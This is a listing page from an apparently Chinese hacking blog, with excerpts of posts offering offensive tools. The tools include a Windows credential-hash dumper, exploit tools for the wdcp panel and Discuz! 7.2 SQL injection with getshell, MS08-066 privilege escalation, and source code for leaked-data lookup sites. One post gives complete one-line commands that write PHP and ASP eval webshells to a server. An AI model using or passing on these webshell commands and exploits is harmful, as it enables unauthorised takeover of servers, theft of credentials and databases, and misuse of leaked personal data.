Quarks PwDump各种32位64系统获取HASH

分类:安全 | 2015-01-10 | 撸过 8,275 次
0人扯谈

Quarks PwDump 是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。这个工具没有注入任何进程,工作原理是神马呢,源代码值得读一下。

它目前可以导出 :
– Local accounts NT/LM hashes + history 本机NT/LM哈希+历史登录记录
– Domain accounts NT/LM hashes + history 域中的NT/LM哈希+历史登录记录
–[......]

继续阅读

Adminer 适合扒裤子的mysql工具

分类:工具 | 2014-12-23 | 撸过 5,209 次
0人扯谈

Adminer是一个类似于phpMyAdmin的MySQL管理客户端。整个程序只有一个PHP文件,易于使用和安装。Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支持PHP4.3+,MySQL 4.1+以上的版本。

提供的功能包括:

1:创建,修改,删除索引/外键/视图/存储过程和函数。
2:查询,合计,排序数据。
3:新增/修改/删除记录。
4:支持所有数据类型,包括大字段。
5:能够批量执行SQL语句。
6:支持将数据,表结构,视图导成SQL或CSV。
7:能够外键关联打印数据库概要。
8:能够查看进程和关闭进程。
9:能够查看用户和权限并修改。[......]

继续阅读

wdcp面板爆严重漏洞附利用工具

分类:工具 | 2014-12-23 | 撸过 7,696 次
1人扯谈

QQ截图20141223133538

[......]

继续阅读

cmd生成webshell语句

分类:安全 | 2014-12-11 | 撸过 3,720 次
2人扯谈

linux:echo -e "<?@include(\\$_POST["c"]);?>" > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c
win:      echo ^<%eval request("c")%^> >>webshell.cc.asp                   会再同目录下生成webshell.cc.asp一句话 密码:c

社工库源码搜集

分类:安全 | 2014-12-4 | 撸过 33,629 次
10人扯谈

我接触的第一个社工库源码是Bamaba的源码 一个Asp+Sqlserver的源码 很简陋
社工库源码搜集

大概就是这个界面 13年前后的大多数社工库都是这个源码改的 包括第一代QQ群查询

asp+sqlserver 单表查询
[......]

继续阅读

ms08066提权 XP提权/2003提权

分类:工具 | 2014-10-1 | 撸过 5,857 次
4人扯谈

6619296394211713340

 
[......]

继续阅读

Discuz! 7.2 SQL注入exp getshell版

分类:安全 | 2014-10-1 | 撸过 2,847 次
1人扯谈

参数:

1.可直接getshell

2.爆管理账号密码

3.爆表前缀

如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。
[......]

继续阅读

K8大牛的C段旁注查询工具 V1.6

分类:安全 | 2014-08-8 | 撸过 7,676 次
0人扯谈

全部复制作者BLOG的懒得写了~

-------------------------------------------------------------------------------------------------------------------------------------------

工具: K8_C段旁注查询工具 V1.6_20140618
编译: VS2012  C# (.NET Framework v4.0)
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2014/6/10 10:19:57

图片: 

V1.6  20140618 效果图  添加对应Banner的图标 这才是更直观 导入导出同样支持图标


[......]

继续阅读

子域名检测大师(自由博客)专版

分类:工具 | 2014-07-2 | 撸过 2,005 次
10人扯谈

[......]

继续阅读

wdcp虚拟主机管理系统注入利用工具

分类:工具 | 2014-04-14 | 撸过 2,493 次
4人扯谈

wdcp (WDlinux Control Panel) 是一套用PHP开发的Linux服务器管理系统,类似国外流行的cpanel,旨在易于使用和管理Linux服务器,可以在线通过网页管理服务器和虚拟主机.简单,方便,易操作.只有Linux版本,没有windows版本,让你方便地使用和管理Linux服务器,让不懂Linux的人也可以用Linux做服务器了.支持CentOS/RedHat/ubuntu/wdlinux_base/wdos 版本。

wdcp服务器/虚拟主机管理系统存在 X-Forwarded-For 盲注漏洞,利用工具如下图

代码加密,无法阅读。
[......]

继续阅读

第 5 页,共 70 页« 最新...34567...102030...最旧 »